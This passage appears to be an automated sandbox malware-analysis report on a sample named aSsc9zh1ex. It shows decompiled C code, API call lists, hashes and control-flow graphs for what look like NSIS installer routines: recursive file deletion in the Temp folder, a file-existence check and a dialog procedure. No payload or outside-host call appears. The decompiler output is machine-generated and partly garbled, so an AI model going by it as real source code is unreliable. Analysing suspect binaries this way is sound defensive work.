                        					 *((intOrPtr*)(_t332 + 0x1050)) = E732D12CC(_t284);
                        					 *(_t332 + 0x103c) =  *(_t332 + 0x103c) & 0x00000000;
                        					 *((intOrPtr*)(_t332 + 0x1048)) = 1;
                        					 *((intOrPtr*)(_t332 + 0x1038)) = 1;
                        					_t90 = _t332 + 0x808; // 0x808
                        					_t229 =  *(_t326->i + E732D13B1(_t90) * 4);
                        					goto L165;
                        				}
                        			}

                        0x732d1cdd
                        0x00000000
                        0x00000000
                        0x00000000
                        0x732d1cdd
                        0x732d1c6d
                        0x732d1c70
                        0x732d1ca6
                        0x732d1ca9
                        0x00000000
                        0x732d1caf
                        0x732d1cb1
                        0x732d1cb5
                        0x732d1cbc
                        0x732d1cc3
                        0x732d1cc6
                        0x732d1cc9
                        0x00000000
                        0x732d1cc9
                        0x732d1ca9
                        0x732d1c72
                        0x732d1c73
                        0x732d1c8e
                        0x732d1c91
                        0x00000000
                        0x732d1c97
                        0x732d1c97
                        0x732d1c9e
                        0x732d1ca1
                        0x00000000
                        0x732d1ca1
                        0x732d1c91
                        0x732d1c78
                        0x00000000
                        0x732d1c7e
                        0x732d1c7e
                        0x732d1c85
                        0x00000000
                        0x732d1c85
                        0x732d1c78
                        0x732d1e74
                        0x732d1e79
                        0x732d1e7e
                        0x732d1e82
                        0x732d2355
                        0x732d235b
                        0x732d1e94
                        0x732d1e96
                        0x732d1e97
                        0x732d227e
                        0x732d227e
                        0x732d2281
                        0x732d2284
                        0x732d22a1
                        0x732d22a7
                        0x732d22a9
                        0x732d22af
                        0x732d22c6
                        0x732d22c6
                        0x732d22c6
                        0x732d22d3
                        0x732d22d9
                        0x732d22dc
                        0x732d22e2
                        0x732d22e4
                        0x732d22e8
                        0x732d22ea
                        0x732d22f1
                        0x732d22f6
                        0x732d22f9
                        0x732d22fb
                        0x732d2300
                        0x732d2312
                        0x732d2312
                        0x732d2300
                        0x732d22f9
                        0x732d22e8
                        0x732d2318
                        0x732d231b
                        0x732d2325
                        0x732d232d
                        0x732d233a
                        0x732d2340
                        0x732d2343
                        0x732d2273
                        0x732d2273
                        0x00000000
                        0x732d2273
                        0x732d2349
                        0x732d234f
                        0x732d234f
                        0x00000000
                        0x00000000
                        0x732d2351
                        0x732d2351
                        0x732d2351
                        0x732d2351
                        0x00000000
                        0x732d231d
                        0x732d231d
                        0x732d2323
                        0x00000000
                        0x00000000
                        0x00000000
                        0x732d2323
                        0x732d231b
                        0x732d22b2
                        0x732d22b8
                        0x732d22ba
                        0x732d22c0
                        0x00000000
                        0x00000000
                        0x00000000
                        0x732d22c0
                        0x732d2286
                        0x732d228d
                        0x732d2293
                        0x732d2299
                        0x00000000
                        0x732d2299
                        0x732d1e9d
                        0x732d1e9e
                        0x732d225d
                        0x732d225d
                        0x732d2263
                        0x732d2266
                        0x00000000
                        0x00000000
                        0x732d226d
                        0x732d2272
                        0x00000000
                        0x732d2272
                        0x732d1ea5
                        0x00000000
                        0x00000000
                        0x732d1eab
                        0x732d1eab
                        0x732d1eb4
                        0x732d1eb9
                        0x732d1ebf
                        0x00000000
                        0x00000000
                        0x732d1ec5
                        0x732d1ed2
                        0x732d1ed8
                        0x732d1ee2
                        0x732d1ee8
                        0x732d1ef0
                        0x732d1f00
                        0x00000000
                        0x732d1f00

                        APIs
                          • Part of subcall function 732D12BB: GlobalAlloc.KERNELBASE(00000040,?,732D12DB,?,732D137F,00000019,732D11CA,-000000A0), ref: 732D12C5
                        • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 732D1D2D
                        • lstrcpyW.KERNEL32 ref: 732D1D75
                        • lstrcpyW.KERNEL32 ref: 732D1D7F
                        • GlobalFree.KERNEL32 ref: 732D1D92
                        • GlobalFree.KERNEL32 ref: 732D1E74
                        • GlobalFree.KERNEL32 ref: 732D1E79
                        • GlobalFree.KERNEL32 ref: 732D1E7E
                        • GlobalFree.KERNEL32 ref: 732D2068
                        • lstrcpyW.KERNEL32 ref: 732D2222
                        • GetModuleHandleW.KERNELBASE(00000008), ref: 732D22A1
                        • LoadLibraryW.KERNELBASE(00000008), ref: 732D22B2
                        • GetProcAddress.KERNEL32(?,?), ref: 732D230C
                        • lstrlenW.KERNEL32(00000808), ref: 732D2326
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.886480223.00000000732D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 732D0000, based on PE: true
                        • Associated: 00000001.00000002.886476119.00000000732D0000.00000002.00000001.01000000.00000006.sdmp
                        • Associated: 00000001.00000002.886488080.00000000732D4000.00000002.00000001.01000000.00000006.sdmp
                        • Associated: 00000001.00000002.886506522.00000000732D6000.00000002.00000001.01000000.00000006.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_732d0000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                        • String ID: Nv@hv
                        • API String ID: 245916457-4226514844
                        • Opcode ID: 97d5ff7e89a1258bb193f54907edecb86093f97fd8bd074944686c3e049b375d
                        • Instruction ID: cfbcbac67c27dcd424be88eae603c4aeb2669b57b14cef492626d91ac3ae3b5e
                        • Opcode Fuzzy Hash: 97d5ff7e89a1258bb193f54907edecb86093f97fd8bd074944686c3e049b375d
                        • Instruction Fuzzy Hash: 5F22AB71E3430ADFDB918FB4C9843AEB7B5FB04305F14852AD1A6E6684D7B4A6C1CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 664 405c26-405c4c call 405ef1 667 405c65-405c6c 664->667 668 405c4e-405c60 DeleteFileW 664->668 670 405c6e-405c70 667->670 671 405c7f-405c8f call 40651a 667->671 669 405de2-405de6 668->669 672 405d90-405d95 670->672 673 405c76-405c79 670->673 677 405c91-405c9c lstrcatW 671->677 678 405c9e-405c9f call 405e35 671->678 672->669 675 405d97-405d9a 672->675 673->671 673->672 679 405da4-405dac call 406850 675->679 680 405d9c-405da2 675->680 681 405ca4-405ca8 677->681 678->681 679->669 688 405dae-405dc2 call 405de9 call 405bde 679->688 680->669 684 405cb4-405cba lstrcatW 681->684 685 405caa-405cb2 681->685 687 405cbf-405cdb lstrlenW FindFirstFileW 684->687 685->684 685->687 689 405ce1-405ce9 687->689 690 405d85-405d89 687->690 704 405dc4-405dc7 688->704 705 405dda-405ddd call 40557c 688->705 693 405d09-405d1d call 40651a 689->693 694 405ceb-405cf3 689->694 690->672 692 405d8b 690->692 692->672 706 405d34-405d3f call 405bde 693->706 707 405d1f-405d27 693->707 696 405cf5-405cfd 694->696 697 405d68-405d78 FindNextFileW 694->697 696->693 700 405cff-405d07 696->700 697->689 703 405d7e-405d7f FindClose 697->703 700->693 700->697 703->690 704->680 710 405dc9-405dd8 call 40557c call 4062da 704->710 705->669 717 405d60-405d63 call 40557c 706->717 718 405d41-405d44 706->718 707->697 711 405d29-405d32 call 405c26 707->711 710->669 711->697 717->697 720 405d46-405d56 call 40557c call 4062da 718->720 721 405d58-405d5e 718->721 720->697 721->697
                        C-Code - Quality: 98%
                        			E00405C26(void* __eflags, signed int _a4, signed int _a8) {
                        				signed int _v8;
                        				signed int _v12;
                        				short _v556;
                        				short _v558;
                        				struct _WIN32_FIND_DATAW _v604;
                        				signed int _t38;
                        				signed int _t52;
                        				signed int _t55;
                        				signed int _t62;
                        				void* _t64;
                        				signed char _t65;
                        				WCHAR* _t66;
                        				void* _t67;
                        				WCHAR* _t68;
                        				void* _t70;
                        
                        				_t65 = _a8;
                        				_t68 = _a4;
                        				_v8 = _t65 & 0x00000004;
                        				_t38 = E00405EF1(__eflags, _t68);
                        				_v12 = _t38;
                        				if((_t65 & 0x00000008) != 0) {
                        					_t62 = DeleteFileW(_t68); // executed
                        					asm("sbb eax, eax");
                        					_t64 =  ~_t62 + 1;
                        					 *0x7a8ae8 =  *0x7a8ae8 + _t64;
                        					return _t64;
                        				}
                        				_a4 = _t65;
                        				_t8 =  &_a4;
                        				 *_t8 = _a4 & 0x00000001;
                        				__eflags =  *_t8;
                        				if( *_t8 == 0) {
                        					L5:
                        					E0040651A(0x7a3f50, _t68);
                        					__eflags = _a4;
                        					if(_a4 == 0) {
                        						E00405E35(_t68);
                        					} else {
                        						lstrcatW(0x7a3f50, L"\\*.*");
                        					}
                        					__eflags =  *_t68;
                        					if( *_t68 != 0) {
                        						L10:
                        						lstrcatW(_t68, 0x40a014);
                        						L11:
                        						_t66 =  &(_t68[lstrlenW(_t68)]);
                        						_t38 = FindFirstFileW(0x7a3f50,  &_v604);
                        						_t70 = _t38;
                        						__eflags = _t70 - 0xffffffff;
                        						if(_t70 == 0xffffffff) {
                        							L26:
                        							__eflags = _a4;
                        							if(_a4 != 0) {
                        								_t30 = _t66 - 2;
                        								 *_t30 =  *(_t66 - 2) & 0x00000000;
                        								__eflags =  *_t30;
                        							}
                        							goto L28;
                        						} else {
                        							goto L12;
                        						}
                        						do {
                        							L12:
                        							__eflags = _v604.cFileName - 0x2e;
                        							if(_v604.cFileName != 0x2e) {
                        								L16:
                        								E0040651A(_t66,  &(_v604.cFileName));
                        								__eflags = _v604.dwFileAttributes & 0x00000010;
                        								if(__eflags == 0) {
                        									_t52 = E00405BDE(__eflags, _t68, _v8);
                        									__eflags = _t52;
                        									if(_t52 != 0) {
                        										E0040557C(0xfffffff2, _t68);
                        									} else {
                        										__eflags = _v8 - _t52;
                        										if(_v8 == _t52) {
                        											 *0x7a8ae8 =  *0x7a8ae8 + 1;
                        										} else {
                        											E0040557C(0xfffffff1, _t68);
                        											E004062DA(_t67, _t68, 0);
                        										}
                        									}
                        								} else {
                        									__eflags = (_a8 & 0x00000003) - 3;
                        									if(__eflags == 0) {
                        										E00405C26(__eflags, _t68, _a8);
                        									}
                        								}
                        								goto L24;
                        							}
                        							__eflags = _v558;
                        							if(_v558 == 0) {
                        								goto L24;
                        							}
                        							__eflags = _v558 - 0x2e;
                        							if(_v558 != 0x2e) {
                        								goto L16;
                        							}
                        							__eflags = _v556;
                        							if(_v556 == 0) {
                        								goto L24;
                        							}
                        							goto L16;
                        							L24:
                        							_t55 = FindNextFileW(_t70,  &_v604);
                        							__eflags = _t55;
                        						} while (_t55 != 0);
                        						_t38 = FindClose(_t70);
                        						goto L26;
                        					}
                        					__eflags =  *0x7a3f50 - 0x5c;
                        					if( *0x7a3f50 != 0x5c) {
                        						goto L11;
                        					}
                        					goto L10;
                        				} else {
                        					__eflags = _t38;
                        					if(_t38 == 0) {
                        						L28:
                        						__eflags = _a4;
                        						if(_a4 == 0) {
                        							L36:
                        							return _t38;
                        						}
                        						__eflags = _v12;
                        						if(_v12 != 0) {
                        							_t38 = E00406850(_t68);
                        							__eflags = _t38;
                        							if(_t38 == 0) {
                        								goto L36;
                        							}
                        							E00405DE9(_t68);
                        							_t38 = E00405BDE(__eflags, _t68, _v8 | 0x00000001);
                        							__eflags = _t38;
                        							if(_t38 != 0) {
                        								return E0040557C(0xffffffe5, _t68);
                        							}
                        							__eflags = _v8;
                        							if(_v8 == 0) {
                        								goto L30;
                        							}
                        							E0040557C(0xfffffff1, _t68);
                        							return E004062DA(_t67, _t68, 0);
                        						}
                        						L30:
                        						 *0x7a8ae8 =  *0x7a8ae8 + 1;
                        						return _t38;
                        					}
                        					__eflags = _t65 & 0x00000002;
                        					if((_t65 & 0x00000002) == 0) {
                        						goto L28;
                        					}
                        					goto L5;
                        				}
                        			}



















                        APIs
                        • DeleteFileW.KERNELBASE(?,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C4F
                        • lstrcatW.KERNEL32(007A3F50,\*.*), ref: 00405C97
                        • lstrcatW.KERNEL32(?,0040A014), ref: 00405CBA
                        • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F50,?,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CC0
                        • FindFirstFileW.KERNEL32(007A3F50,?,?,?,0040A014,?,007A3F50,?,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CD0
                        • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D70
                        • FindClose.KERNEL32(00000000), ref: 00405D7F
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                        • String ID: .$.$C:\Users\user\AppData\Local\Temp\$P?z$\*.*
                        • API String ID: 2035342205-1425114641
                        • Opcode ID: 86a9ea6cbb14b57aebf4225f9df046bf70f97581db132fea7010d611e8ef0d07
                        • Instruction ID: 717efa72a3eb519caeee53ac910e89dbb8479b941b5c6030fce336447c755aae
                        • Opcode Fuzzy Hash: 86a9ea6cbb14b57aebf4225f9df046bf70f97581db132fea7010d611e8ef0d07
                        • Instruction Fuzzy Hash: C341B230800A14BADB21AB659D8DAAF7778DF85718F24813FF401751D1D77C4A82DE6E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 947 406850-406864 FindFirstFileW 948 406871 947->948 949 406866-40686f FindClose 947->949 950 406873-406874 948->950 949->950
                        C-Code - Quality: 100%
                        			E00406850(WCHAR* _a4) {
                        				void* _t2;
                        
                        				_t2 = FindFirstFileW(_a4, 0x7a4f98); // executed
                        				if(_t2 == 0xffffffff) {
                        					return 0;
                        				}
                        				FindClose(_t2);
                        				return 0x7a4f98;
                        			}





                        APIs
                        • FindFirstFileW.KERNELBASE(76F1FAA0,007A4F98,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,00405F3A,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,76F1FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\), ref: 0040685B
                        • FindClose.KERNEL32(00000000), ref: 00406867
                        Strings
                        • C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp, xrefs: 00406850
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: Find$CloseFileFirst
                        • String ID: C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp
                        • API String ID: 2295610775-326868885
                        • Opcode ID: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                        • Instruction ID: 4aa2ce40dd0fdaaf15299f79bbf0ddad0ee07bd1ec444a92f9406ee76b8f93c8
                        • Opcode Fuzzy Hash: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                        • Instruction Fuzzy Hash: 3CD012365592205FC7402779AE0CC4B7A689F563313268B36B0EAF11F0CA74CC3296ED
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        control_flow_graph 194 403f77-403f89 195 4040f0-4040ff 194->195 196 403f8f-403f95 194->196 198 404101-40413c GetDlgItem * 2 call 404476 KiUserCallbackDispatcher call 40140b 195->198 199 40414e-404163 195->199 196->195 197 403f9b-403fa4 196->197 203 403fa6-403fb3 SetWindowPos 197->203 204 403fb9-403fc0 197->204 220 404141-404149 198->220 201 4041a3-4041a8 call 4044c2 199->201 202 404165-404168 199->202 216 4041ad-4041c8 201->216 206 40416a-404175 call 401389 202->206 207 40419b-40419d 202->207 203->204 209 403fc2-403fdc ShowWindow 204->209 210 404004-40400a 204->210 206->207 233 404177-404196 SendMessageW 206->233 207->201 215 404443 207->215 217 403fe2-403ff5 GetWindowLongW 209->217 218 4040dd-4040eb call 4044dd 209->218 212 404023-404026 210->212 213 40400c-40401e DestroyWindow 210->213 223 404028-404034 SetWindowLongW 212->223 224 404039-40403f 212->224 221 404420-404426 213->221 222 404445-40444c 215->222 227 4041d1-4041d7 216->227 228 4041ca-4041cc call 40140b 216->228 217->218 219 403ffb-403ffe ShowWindow 217->219 218->222 219->210 220->199 221->215 229 404428-40442e 221->229 223->222 224->218 232 404045-404054 GetDlgItem 224->232 230 404401-40441a DestroyWindow EndDialog 227->230 231 4041dd-4041e8 227->231 228->227 229->215 236 404430-404439 ShowWindow 229->236 230->221 231->230 237 4041ee-40423b call 406557 call 404476 * 3 GetDlgItem 231->237 238 404073-404076 232->238 239 404056-40406d SendMessageW IsWindowEnabled 232->239 233->222 236->215 266 404245-404281 ShowWindow KiUserCallbackDispatcher call 404498 EnableWindow 237->266 267 40423d-404242 237->267 241 404078-404079 238->241 242 40407b-40407e 238->242 239->215 239->238 244 4040a9-4040ae call 40444f 241->244 245 404080-404086 242->245 246 40408c-404091 242->246 244->218 249 4040c7-4040d7 SendMessageW 245->249 250 404088-40408a 245->250 246->249 251 404093-404099 246->251 249->218 250->244 254 4040b0-4040b9 call 40140b 251->254 255 40409b-4040a1 call 40140b 251->255 254->218 264 
4040bb-4040c5 254->264 262 4040a7 255->262 262->244 264->262 270 404283-404284 266->270 271 404286 266->271 267->266 272 404288-4042b6 GetSystemMenu EnableMenuItem SendMessageW 270->272 271->272 273 4042b8-4042c9 SendMessageW 272->273 274 4042cb 272->274 275 4042d1-404310 call 4044ab call 403f58 call 40651a lstrlenW call 406557 SetWindowTextW call 401389 273->275 274->275 275->216 286 404316-404318 275->286 286->216 287 40431e-404322 286->287 288 404341-404355 DestroyWindow 287->288 289 404324-40432a 287->289 288->221 291 40435b-404388 CreateDialogParamW 288->291 289->215 290 404330-404336 289->290 290->216 292 40433c 290->292 291->221 293 40438e-4043e5 call 404476 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 291->293 292->215 293->215 298 4043e7-4043fa ShowWindow call 4044c2 293->298 300 4043ff 298->300 300->221
                        C-Code - Quality: 86%
                        			E00403F77(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                        				struct HWND__* _v28;
                        				void* _v80;
                        				void* _v84;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t34;
                        				signed int _t36;
                        				signed int _t38;
                        				struct HWND__* _t48;
                        				signed int _t67;
                        				struct HWND__* _t73;
                        				signed int _t86;
                        				struct HWND__* _t91;
                        				signed int _t99;
                        				int _t103;
                        				signed int _t117;
                        				int _t118;
                        				int _t122;
                        				signed int _t124;
                        				struct HWND__* _t127;
                        				struct HWND__* _t128;
                        				int _t129;
                        				intOrPtr _t130;
                        				long _t133;
                        				int _t135;
                        				int _t136;
                        				void* _t137;
                        
                        				_t130 = _a8;
                        				if(_t130 == 0x110 || _t130 == 0x408) {
                        					_t34 = _a12;
                        					_t127 = _a4;
                        					__eflags = _t130 - 0x110;
                        					 *0x7a1f30 = _t34;
                        					if(_t130 == 0x110) {
                        						 *0x7a8a68 = _t127;
                        						 *0x7a1f44 = GetDlgItem(_t127, 1);
                        						_t91 = GetDlgItem(_t127, 2);
                        						_push(0xffffffff);
                        						_push(0x1c);
                        						 *0x79ff10 = _t91;
                        						E00404476(_t127);
                        						SetClassLongW(_t127, 0xfffffff2,  *0x7a7a48); // executed
                        						 *0x7a7a2c = E0040140B(4);
                        						_t34 = 1;
                        						__eflags = 1;
                        						 *0x7a1f30 = 1;
                        					}
                        					_t124 =  *0x40a368; // 0x0
                        					_t136 = 0;
                        					_t133 = (_t124 << 6) +  *0x7a8a80;
                        					__eflags = _t124;
                        					if(_t124 < 0) {
                        						L36:
                        						E004044C2(0x40b);
                        						while(1) {
                        							_t36 =  *0x7a1f30;
                        							 *0x40a368 =  *0x40a368 + _t36;
                        							_t133 = _t133 + (_t36 << 6);
                        							_t38 =  *0x40a368; // 0x0
                        							__eflags = _t38 -  *0x7a8a84;
                        							if(_t38 ==  *0x7a8a84) {
                        								E0040140B(1);
                        							}
                        							__eflags =  *0x7a7a2c - _t136;
                        							if( *0x7a7a2c != _t136) {
                        								break;
                        							}
                        							__eflags =  *0x40a368 -  *0x7a8a84; // 0x0
                        							if(__eflags >= 0) {
                        								break;
                        							}
                        							_t117 =  *(_t133 + 0x14);
                        							E00406557(_t117, _t127, _t133, 0x7b8000,  *((intOrPtr*)(_t133 + 0x24)));
                        							_push( *((intOrPtr*)(_t133 + 0x20)));
                        							_push(0xfffffc19);
                        							E00404476(_t127);
                        							_push( *((intOrPtr*)(_t133 + 0x1c)));
                        							_push(0xfffffc1b);
                        							E00404476(_t127);
                        							_push( *((intOrPtr*)(_t133 + 0x28)));
                        							_push(0xfffffc1a);
                        							E00404476(_t127);
                        							_t48 = GetDlgItem(_t127, 3);
                        							__eflags =  *0x7a8aec - _t136;
                        							_v28 = _t48;
                        							if( *0x7a8aec != _t136) {
                        								_t117 = _t117 & 0x0000fefd | 0x00000004;
                        								__eflags = _t117;
                        							}
                        							ShowWindow(_t48, _t117 & 0x00000008); // executed
                        							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
                        							E00404498(_t117 & 0x00000002);
                        							_t118 = _t117 & 0x00000004;
                        							EnableWindow( *0x79ff10, _t118);
                        							__eflags = _t118 - _t136;
                        							if(_t118 == _t136) {
                        								_push(1);
                        							} else {
                        								_push(_t136);
                        							}
                        							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                        							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                        							__eflags =  *0x7a8aec - _t136;
                        							if( *0x7a8aec == _t136) {
                        								_push( *0x7a1f44);
                        							} else {
                        								SendMessageW(_t127, 0x401, 2, _t136);
                        								_push( *0x79ff10);
                        							}
                        							E004044AB();
                        							E0040651A(0x7a1f48, E00403F58());
                        							E00406557(0x7a1f48, _t127, _t133,  &(0x7a1f48[lstrlenW(0x7a1f48)]),  *((intOrPtr*)(_t133 + 0x18)));
                        							SetWindowTextW(_t127, 0x7a1f48); // executed
                        							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)), _t136);
                        							__eflags = _t67;
                        							if(_t67 != 0) {
                        								continue;
                        							} else {
                        								__eflags =  *_t133 - _t136;
                        								if( *_t133 == _t136) {
                        									continue;
                        								}
                        								__eflags =  *(_t133 + 4) - 5;
                        								if( *(_t133 + 4) != 5) {
                        									DestroyWindow( *0x7a7a38); // executed
                        									 *0x7a0f20 = _t133;
                        									__eflags =  *_t133 - _t136;
                        									if( *_t133 <= _t136) {
                        										goto L60;
                        									}
                        									_t73 = CreateDialogParamW( *0x7a8a60,  *_t133 +  *0x7a7a40 & 0x0000ffff, _t127,  *( *(_t133 + 4) * 4 + "5F@"), _t133); // executed
                        									__eflags = _t73 - _t136;
                        									 *0x7a7a38 = _t73;
                        									if(_t73 == _t136) {
                        										goto L60;
                        									}
                        									_push( *((intOrPtr*)(_t133 + 0x2c)));
                        									_push(6);
                        									E00404476(_t73);
                        									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                        									ScreenToClient(_t127, _t137 + 0x10);
                        									SetWindowPos( *0x7a7a38, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                        									E00401389( *((intOrPtr*)(_t133 + 0xc)), _t136);
                        									__eflags =  *0x7a7a2c - _t136;
                        									if( *0x7a7a2c != _t136) {
                        										goto L63;
                        									}
                        									ShowWindow( *0x7a7a38, 8); // executed
                        									E004044C2(0x405);
                        									goto L60;
                        								}
                        								__eflags =  *0x7a8aec - _t136;
                        								if( *0x7a8aec != _t136) {
                        									goto L63;
                        								}
                        								__eflags =  *0x7a8ae0 - _t136;
                        								if( *0x7a8ae0 != _t136) {
                        									continue;
                        								}
                        								goto L63;
                        							}
                        						}
                        						DestroyWindow( *0x7a7a38);
                        						 *0x7a8a68 = _t136;
                        						EndDialog(_t127,  *0x7a0718);
                        						goto L60;
                        					} else {
                        						__eflags = _t34 - 1;
                        						if(_t34 != 1) {
                        							L35:
                        							__eflags =  *_t133 - _t136;
                        							if( *_t133 == _t136) {
                        								goto L63;
                        							}
                        							goto L36;
                        						}
                        						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)), 0);
                        						__eflags = _t86;
                        						if(_t86 == 0) {
                        							goto L35;
                        						}
                        						SendMessageW( *0x7a7a38, 0x40f, 0, 1);
                        						__eflags =  *0x7a7a2c;
                        						return 0 |  *0x7a7a2c == 0x00000000;
                        					}
                        				} else {
                        					_t127 = _a4;
                        					_t136 = 0;
                        					if(_t130 == 0x47) {
                        						SetWindowPos( *0x7a1f28, _t127, 0, 0, 0, 0, 0x13);
                        					}
                        					_t122 = _a12;
                        					if(_t130 != 5) {
                        						L8:
                        						if(_t130 != 0x40d) {
                        							__eflags = _t130 - 0x11;
                        							if(_t130 != 0x11) {
                        								__eflags = _t130 - 0x111;
                        								if(_t130 != 0x111) {
                        									goto L28;
                        								}
                        								_t135 = _t122 & 0x0000ffff;
                        								_t128 = GetDlgItem(_t127, _t135);
                        								__eflags = _t128 - _t136;
                        								if(_t128 == _t136) {
                        									L15:
                        									__eflags = _t135 - 1;
                        									if(_t135 != 1) {
                        										__eflags = _t135 - 3;
                        										if(_t135 != 3) {
                        											_t129 = 2;
                        											__eflags = _t135 - _t129;
                        											if(_t135 != _t129) {
                        												L27:
                        												SendMessageW( *0x7a7a38, 0x111, _t122, _a16);
                        												goto L28;
                        											}
                        											__eflags =  *0x7a8aec - _t136;
                        											if( *0x7a8aec == _t136) {
                        												_t99 = E0040140B(3);
                        												__eflags = _t99;
                        												if(_t99 != 0) {
                        													goto L28;
                        												}
                        												 *0x7a0718 = 1;
                        												L23:
                        												_push(0x78);
                        												L24:
                        												E0040444F();
                        												goto L28;
                        											}
                        											E0040140B(_t129);
                        											 *0x7a0718 = _t129;
                        											goto L23;
                        										}
                        										__eflags =  *0x40a368 - _t136; // 0x0
                        										if(__eflags <= 0) {
                        											goto L27;
                        										}
                        										_push(0xffffffff);
                        										goto L24;
                        									}
                        									_push(_t135);
                        									goto L24;
                        								}
                        								SendMessageW(_t128, 0xf3, _t136, _t136);
                        								_t103 = IsWindowEnabled(_t128);
                        								__eflags = _t103;
                        								if(_t103 == 0) {
                        									L63:
                        									return 0;
                        								}
                        								goto L15;
                        							}
                        							SetWindowLongW(_t127, _t136, _t136);
                        							return 1;
                        						}
                        						DestroyWindow( *0x7a7a38);
                        						 *0x7a7a38 = _t122;
                        						L60:
                        						if( *0x7a3f48 == _t136 &&  *0x7a7a38 != _t136) {
                        							ShowWindow(_t127, 0xa); // executed
                        							 *0x7a3f48 = 1;
                        						}
                        						goto L63;
                        					} else {
                        						asm("sbb eax, eax");
                        						ShowWindow( *0x7a1f28,  ~(_t122 - 1) & 0x00000005);
